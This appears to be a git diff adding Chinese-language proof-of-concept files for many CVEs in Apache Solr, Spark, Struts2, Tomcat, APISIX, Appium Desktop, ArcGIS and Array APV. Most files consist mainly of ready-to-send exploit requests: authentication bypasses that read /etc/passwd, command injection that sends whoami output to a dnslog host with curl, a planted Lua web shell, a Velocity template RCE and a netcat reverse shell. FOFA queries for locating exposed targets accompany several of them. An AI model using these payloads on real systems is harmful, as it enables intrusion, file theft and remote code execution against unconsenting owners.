+- https://xz.aliyun.com/t/15653
\ No newline at end of file
diff --git a/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md b/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md
new file mode 100644
index 0000000..40ca576
--- /dev/null
+++ b/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md
@@ -0,0 +1,60 @@
+# Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216)
+
+**Apache Solr 身份认证绕过漏洞(CVE-2024-45216)**，该漏洞存在于Apache Solr的PKIAuthenticationPlugin中，该插件在启用Solr身份验证时默认启用。攻击者可以利用在任何Solr API URL路径末尾添加假结尾的方式，绕过身份验证访问任意路由，从而获取敏感数据或进行其他恶意操作。
+
+## **影响版本**
+
+5.3.0 <= Apache Solr < 8.11.4
+
+9.0.0 <= Apache Solr < 9.7.0
+
+## fofa
+
+```javascript
+app="APACHE-Solr"
+```
+
+## poc
+
+利用:/admin/info/key绕过身份验证，获取core名称
+
+```javascript
+GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
+Host: 
+SolrAuth: test
+```
+
+![image-20241101193059643](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011930714.png)
+
+修改 core 配置
+
+```javascript
+POST /solr/core名称/config:/admin/info/key HTTP/1.1
+Host: 
+SolrAuth: test
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
+Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Connection: close
+
+{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+```
+
+![image-20241101193142994](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011931058.png)
+
+读取文件/etc/passwd
+
+```javascript
+GET /solr/core名称/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
+Host: 
+SolrAuth: test
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
+Accept-Encoding: gzip, deflate 
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 
+Connection: close
+```
+
+![image-20241101193217925](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011932008.png)
\ No newline at end of file
diff --git a/Apache-Spark命令执行漏洞(CVE-2023-32007).md b/Apache-Spark命令执行漏洞(CVE-2023-32007).md
new file mode 100644
index 0000000..2f4ebaf
--- /dev/null
+++ b/Apache-Spark命令执行漏洞(CVE-2023-32007).md
@@ -0,0 +1,24 @@
+## 介绍
+Apache Spark是美国阿帕奇（Apache）基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。
+
+Apache Spark 3.4.0之前版本存在命令注入漏洞，该漏洞源于如果ACL启用后，HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟，这将导致任意shell命令执行。
+
+## 漏洞版本
+3.1.1 <= Apache Spark < 3.2.2
+
+## 利用条件
+Apache Spark UI 启用 ACL ，且低权限
+
+## 漏洞poc
+```
+GET /jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn` HTTP/1.1
+Host: 10.211.55.7:4040
+Connection: keep-alive
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0  Chrome/116.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
diff --git a/Apache-Struts2-CVE-2023-50164.md b/Apache-Struts2-CVE-2023-50164.md
new file mode 100644
index 0000000..7206e5e
--- /dev/null
+++ b/Apache-Struts2-CVE-2023-50164.md
@@ -0,0 +1,94 @@
+## Apache Struts2 CVE-2023-50164
+
+漏洞描述里提到可通过伪造文件上传的参数导致目录穿越，看版本比对，有两个 Commit 引起我的关注，一个是 Always delete uploaded file，另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传，在修复之前，通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中；
+
+## 漏洞复现分析
+- https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
+- https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/
+  
+## poc
+```
+POST /s2_066_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: en-US,en;q=0.9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Length: 593
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="upload"; filename="poc.txt"
+Content-Type: text/plain
+ 
+test
+ 
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="caption";
+ 
+ 
+{{randstr(4097,4097)}}
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip--
+```
+
+
+```
+POST /s2_066_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: en-US,en;q=0.9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Length: 593
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="upload"; filename="poc.txt"
+Content-Type: text/plain
+ 
+test
+ 
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="uploadFileName";
+ 
+../../poc.txt
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip--
+
+```
+
+```
+POST /untitled4_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------299952630938737678921373326300
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Site: same-origin
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Sec-Fetch-Mode: navigate
+Origin: http://localhost:8080
+Sec-Fetch-Dest: document
+Cookie: JSESSIONID=4519C8974359B23EE133A5CEA707D7D0; USER_NAME_COOKIE=admin; SID_1=69cf26c6
+Referer: http://localhost:8080/untitled4_war_exploded/
+Content-Length: 63765
+
+-----------------------------299952630938737678921373326300
+Content-Disposition: form-data; name="Upload"; filename="12.txt"
+Content-Type: image/png
+
+111
+-----------------------------299952630938737678921373326300
+Content-Disposition: form-data; name="uploadFileName"; 
+Content-Type: text/plain
+
+../123.jsp
+-----------------------------299952630938737678921373326300--
+```
+![image](https://github.com/wy876/POC/assets/139549762/afd588e7-f552-46bf-a2de-6c568d0fc1a2)
+
+- https://blog.csdn.net/qq_18193739/article/details/134935865
+  
diff --git a/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md b/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md
new file mode 100644
index 0000000..145d4a9
--- /dev/null
+++ b/Apache-Tomcat存在信息泄露漏洞(-CVE-2024-21733).md
@@ -0,0 +1,38 @@
+## Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)
+
+Apache Tomcat 信息泄露漏洞（CVE-2024-21733）情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器，用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器，处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求，在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态，从而造成信息泄露。
+
+
+## 影响版本
+```
+从8.5.7到8.5.63
+9.0.0-M11到9.0.43
+```
+
+
+## poc
+```
+POST / HTTP/1.1
+Host: hostname
+Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+Connection: keep-alive
+Content-Length: 6
+Content-Type: application/x-www-form-urlencoded
+
+X
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/15933e83-bb51-4d91-ba49-c31ab8d27cdb)
+
diff --git a/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md b/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md
new file mode 100644
index 0000000..51995b3
--- /dev/null
+++ b/Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379).md
@@ -0,0 +1,209 @@
+# Apache-Tomcat条件竞争致远程代码执行漏洞(CVE-2024-50379)
+
+最近爆出 Apache Tomcat条件竞争导致的RCE，影响范围当然是巨大的，公司也及时收到了相关情报，于是老大让我复现，以更好的帮助公司进行修复漏洞。
+
+复现难度其实并不大，但是成功率很低，我在复现过程中也尝试了很多tomcat、java版本，操作一样但结果不同，相信很多师傅也在复现，希望能够成功，所以我对“成功率”进行了一点点研究，希望能够提高师傅们复现成功的概率。
+
+# 环境搭建
+
+经过多次的尝试，建议大家使用java8不要用太高的java版本 否则难以复现成功（关注后台回复20241219可以获取跟我一样的漏洞复现环境和POC）这里使用的环境如下：
+
+```
+jre1.8.0_202
+apache-tomcat-9.0.63
+```
+
+**windows虚拟机**
+
+配置环境变量
+
+这里一定要配置JAVA_HOME否则会报错
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105830.webp)
+
+需要将这个版本的java的环境变量置顶，防止其他版本的干扰，大家应该都明白
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105783.webp)
+
+配置CATALINA_BASE
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105591.webp)
+
+这下环境变量就已经配置齐了 这个时候就已经可以正常启动tomcat了 运行这个批处理文件
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105836.webp)
+
+启动成功（乱码无所谓的 web.xml改一下GBK即可）
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105215.webp)
+
+# 漏洞分析
+
+影响版本
+
+11.0.0-M1 <= Apache Tomcat < 11.0.2
+
+10.1.0-M1 <= Apache Tomcat < 10.1.34
+
+9.0.0.M1 <= Apache Tomcat < 9.0.98
+
+漏洞原理
+
+首先来看看著名的**CVE-2017-12615**，我们查看tomocat的配置 (conf/web.xml)
+
+```
+    <!-- The mapping for the default servlet -->
+    <servlet-mapping>
+        <servlet-name>default</servlet-name>
+        <url-pattern>/</url-pattern>
+    </servlet-mapping>
+
+    <!-- The mappings for the JSP servlet -->
+    <servlet-mapping>
+        <servlet-name>jsp</servlet-name>
+        <url-pattern>*.jsp</url-pattern>
+        <url-pattern>*.jspx</url-pattern>
+    </servlet-mapping>
+```
+
+当请求的后缀为jsp或jspx的时候交由JSP servlet进行处理请求，此外交给default servlet进行处理请求。而我们查看**CVE-2017-12615**的payload可知，它对文件后缀采取了一些绕过，例如PUT一个1.jsp/、1.jsp空格、1.jsp%00从而绕过JSP servlet的限制，让default servlet来处理请求。当default servlet处理PUT请求时如下图
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105069.webp)
+
+```java
+ @Override
+    protected void doPut(HttpServletRequest req, HttpServletResponse resp)
+        throws ServletException, IOException {
+
+        if (readOnly) {
+            sendNotAllowed(req, resp);
+            return;
+        }
+
+        String path = getRelativePath(req);
+
+        WebResource resource = resources.getResource(path);
+
+        Range range = parseContentRange(req, resp);
+
+        if (range == null) {
+            // Processing error. parseContentRange() set the error code
+            return;
+        }
+
+        InputStream resourceInputStream = null;
+
+        try {
+            // Append data specified in ranges to existing content for this
+            // resource - create a temp. file on the local filesystem to
+            // perform this operation
+            // Assume just one range is specified for now
+            if (range == IGNORE) {
+                resourceInputStream = req.getInputStream();
+            } else {
+                File contentFile = executePartialPut(req, range, path);
+                resourceInputStream = new FileInputStream(contentFile);
+            }
+
+            if (resources.write(path, resourceInputStream, true)) {
+                if (resource.exists()) {
+                    resp.setStatus(HttpServletResponse.SC_NO_CONTENT);
+                } else {
+                    resp.setStatus(HttpServletResponse.SC_CREATED);
+                }
+            } else {
+                resp.sendError(HttpServletResponse.SC_CONFLICT);
+            }
+        } finally {
+            if (resourceInputStream != null) {
+                try {
+                    resourceInputStream.close();
+                } catch (IOException ioe) {
+                    // Ignore
+                }
+            }
+        }
+    }
+
+```
+
+会去检查配置文件中的readonly的值是否为false，如果是true的话就直接return也就是不允许put请求，所以我们需要在配置文件中进行如下设置 (conf/web.cml) 注意是default servlet，因为上面讲了我们最终处理put请求是default servlet
+
+```
+  <servlet>
+        <servlet-name>default</servlet-name>
+        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
+
+        <init-param>
+            <param-name>debug</param-name>
+            <param-value>0</param-value>
+        </init-param>
+        <init-param>
+            <param-name>listings</param-name>
+            <param-value>false</param-value>
+        </init-param>
+        <init-param>
+            <param-name>readonly</param-name>
+            <param-value>false</param-value>
+        </init-param>
+        <load-on-startup>1</load-on-startup>
+    </servlet>
+```
+
+最终就可以进行put上传shell了，这个就是**CVE-2017-12615**。
+
+那么再看看最近很火的CVE-2024-50379。原理是条件竞争，通过并发put文件上传非标准后缀的“jsp”，并不断发起get请求一个标准后最的“jsp”文件，最终由于服务器的大小写不敏感，导致请求成功造成RCE。
+
+看看pyload是put一个xxx.Jsp（也可以PUT html........），为什么长这样呢？阅读了上文，固然就明白了。 当然是要绕过jsp servlet的后缀匹配规则了然后让default servlet去处理请求。
+
+现在我们尝试PUT一下 数据包如下
+
+```
+PUT /test.Jsp HTTP/1.1
+Host: 192.168.19.135:8080
+
+<% Runtime.getRuntime().exec("calc.exe");%>
+```
+
+返回状态码是201代表上传成功 可以去webapps/ROOT目录看到
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311105018.webp)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106320.webp)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106484.webp)
+
+再次重放请求的时候就是204的状态码了  说明文件已经存在
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106218.webp)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106369.webp)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106865.webp)
+
+# 漏洞复现
+
+接下来开始复现该漏洞 我用的是window虚拟机 而不是真机，因为我电脑内存太大，可能效果不会很明显，毕竟要用到条件竞争，所以如果想成功率高一点建议用虚拟机，把内核、内存大小设置小一点。
+
+yakit-发送到webFuzzer 发三个  get的并发线程建议大于前面两个
+
+第一个
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106981.webp)
+
+第二个
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106377.webp)
+
+第三个 
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106855.webp)
+
+开弹
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311106630.webp)
+
+在我虚拟机卡的时候往往容易成功 有时候直接用yakit就能成功，有时候不行，所以我同时用yakit和脚步一起打 
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/d7dneaUgF2TD2KGdT1qiQw
\ No newline at end of file
diff --git a/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md b/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md
new file mode 100644
index 0000000..d6f3563
--- /dev/null
+++ b/ApacheAPISIX默认密钥漏洞(CVE-2020-13945).md
@@ -0,0 +1,62 @@
+# Apache APISIX 默认密钥漏洞(CVE-2020-13945)
+
+# 一、漏洞简介
+Apache APISIX 是一个动态、实时、高性能的 API 网关，基于 Nginx 网络库和 etcd 实现， 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API，没有配置相应的IP访问策略，且没有修改配置文件Token的情况下，通过攻击管理员接口，即可使用script参数来插入任意LUA脚本并执行。
+
+# 二、影响版本
++ Apache APISIX 1.2—1.5
+
+# 三、资产测绘
++ hunter`app.name="APISIX"`
++ 特征
+
+![1701951610416-3ffe8b1a-f818-46c3-90c2-9750d0c8c33a.png](./img/8VgmrJDcYVfiQISB/1701951610416-3ffe8b1a-f818-46c3-90c2-9750d0c8c33a-167144.png)
+
+![1701951623458-647668b0-2b49-4197-8fea-a196df8827aa.png](./img/8VgmrJDcYVfiQISB/1701951623458-647668b0-2b49-4197-8fea-a196df8827aa-935600.png)
+
+# 四、漏洞复现
+利用默认Token增加一个恶意的router，其中包含恶意LUA脚本：
+
+```plain
+POST /apisix/admin/routes HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+Content-Type: application/json
+Content-Length: 406
+
+{
+    "uri": "/attack",
+"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
+    "upstream": {
+        "type": "roundrobin",
+        "nodes": {
+            "example.com:80": 1
+        }
+    }
+}
+```
+
+访问刚才添加的router，就可以通过cmd参数执行任意命令
+
+```plain
+/attack?cmd=id
+```
+
+![1701951737969-45ca1cec-6fd1-44ab-9a55-cdbccf8bf568.png](./img/8VgmrJDcYVfiQISB/1701951737969-45ca1cec-6fd1-44ab-9a55-cdbccf8bf568-114498.png)
+
+# 五、修复建议
+1. 修改Apache APISIX配置文件中 conf/config.yaml 的admin_key，禁止使用默认Token
+
+2. 若非必要，关闭Apache APISIX Admin API功能，或者增加IP访问限制。
+
+3. 升级Apache APISIX 至最新版本。
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sz75upt9woezyc2g>
\ No newline at end of file
diff --git a/ApacheSolrVelocity模版注入远程命令执行漏洞（CVE-2019-17558）.md b/ApacheSolrVelocity模版注入远程命令执行漏洞（CVE-2019-17558）.md
new file mode 100644
index 0000000..ea18c48
--- /dev/null
+++ b/ApacheSolrVelocity模版注入远程命令执行漏洞（CVE-2019-17558）.md
@@ -0,0 +1,81 @@
+# Apache Solr Velocity模版注入远程命令执行漏洞（CVE-2019-17558）
+
+# 一、漏洞简介
+`Apache Solr`是`Apache Lucene`项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成以及富文本的处理。`Apache Solr`存在模版注入漏洞。攻击者通过未授权访问`Solr`服务器，发送特定的数据包开启`params.resource.loader.enabled`,而后get访问接口导致远程命令执行漏洞
+
+## 二、影响版本
++ `Apache Solr 5.0.0~8.3.1`
+
+# 三、资产测绘
++ hunter`app.name="Solr"`
++ 登录页面
+
+![1693661111137-6bda495c-39b5-4f89-b54a-8fda4d74b3fd.png](./img/-2GTgOX_-wpT2ukM/1693661111137-6bda495c-39b5-4f89-b54a-8fda4d74b3fd-916775.png)
+
+# 四、漏洞复现
+1. 默认情况下`params.resource.loader.enabled`配置未打开，无法使用自定义模版，可以通过api获取所有核心core
+
+```java
+GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1693661185287-f2301704-3803-452d-8ba5-0db27d594d85.png](./img/-2GTgOX_-wpT2ukM/1693661185287-f2301704-3803-452d-8ba5-0db27d594d85-040330.png)
+
+2. 启用配置`params.resource.loader.enabled`,其中API路径包含刚才获取的core名称
+
+```java
+POST /solr/class/config HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/json
+Content-Length: 259
+
+{
+  "update-queryresponsewriter": {
+    "startup": "lazy",
+    "name": "velocity",
+    "class": "solr.VelocityResponseWriter",
+    "template.base.dir": "",
+    "solr.resource.loader.enabled": "true",
+    "params.resource.loader.enabled": "true"
+  }
+}
+```
+
+![1693661211872-b2d5c27e-f9c2-425f-be37-517c12f54277.png](./img/-2GTgOX_-wpT2ukM/1693661211872-b2d5c27e-f9c2-425f-be37-517c12f54277-144560.png)
+
+3. 查询`params.resource.loader.enabled`是否开启
+
+![1693661505022-777ef604-c59f-4e9e-a649-8f14934e807f.png](./img/-2GTgOX_-wpT2ukM/1693661505022-777ef604-c59f-4e9e-a649-8f14934e807f-351305.png)
+
+4. 通过注入Velocity模板即可执行任意命令
+
+```java
+GET /solr/class/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1693661647398-287f7ec3-998e-4681-920d-77ea1cd545df.png](./img/-2GTgOX_-wpT2ukM/1693661647398-287f7ec3-998e-4681-920d-77ea1cd545df-570598.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/enyp0cmgiol1otx3>
\ No newline at end of file
diff --git a/Appium-Desktop-CVE-2023-2479漏洞.md b/Appium-Desktop-CVE-2023-2479漏洞.md
new file mode 100644
index 0000000..25833e2
--- /dev/null
+++ b/Appium-Desktop-CVE-2023-2479漏洞.md
@@ -0,0 +1,14 @@
+## Appium Desktop CVE-2023-2479漏洞
+
+appium-desktop 是 Appium 服务器的图形界面，也是一个应用程序检查器
+
+由于用户输入审查不当，此软件包的受影响版本容易受到命令注入的攻击，允许攻击者设置反向 shell。
+
+
+## poc
+```
+http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>
+
+http://127.0.0.1/?url=<img/src="http://nbjfpetfmu.dgrh3.cn"> 
+
+```
diff --git a/ArcGIS地理信息系统任意文件读取漏洞.md b/ArcGIS地理信息系统任意文件读取漏洞.md
new file mode 100644
index 0000000..f3df380
--- /dev/null
+++ b/ArcGIS地理信息系统任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# ArcGIS地理信息系统任意文件读取漏洞
+
+ArcGIS地理信息系统 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+app="esri-ArcGIS"
+```
+
+## poc
+
+```javascript
+GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241106172857303](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061728383.png)
\ No newline at end of file
diff --git a/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md b/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md
new file mode 100644
index 0000000..79f7738
--- /dev/null
+++ b/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md
@@ -0,0 +1,26 @@
+# Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞
+
+Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。该漏洞利用难度较低，建议受影响的用户尽快修复。
+
+## fofa
+
+```javascript
+app="Array-APV" && title=="Login"
+```
+
+## poc
+
+```javascript
+POST /restapi/../rest/ping_hosts HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Connection: keep-alive
+
+["127.0.0.1| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW
+```
+
+![image-20240913223135601](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132231693.png)
\ No newline at end of file
diff --git a/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md b/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md
new file mode 100644
index 0000000..848d9af
--- /dev/null
+++ b/Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞.md
@@ -0,0 +1,37 @@
+# Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞
+
+# 一、漏洞简介
+Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。该漏洞利用难度较低，建议受影响的用户尽快修复.
+
+# 二、影响版本
++ Array APV
+
+# 三、资产测绘
++ fofa`app="Array-APV" && title=="Login"`
++ 特征
+
+![1726293906133-59539fc8-cda4-4f9f-82de-3b0706541ee4.png](./img/f_WgzfyB4eIEXb7f/1726293906133-59539fc8-cda4-4f9f-82de-3b0706541ee4-291132.png)
+
+# 四、漏洞复现
+```java
+POST /restapi/../rest/ping_hosts HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/javascript, */*; q=0.01
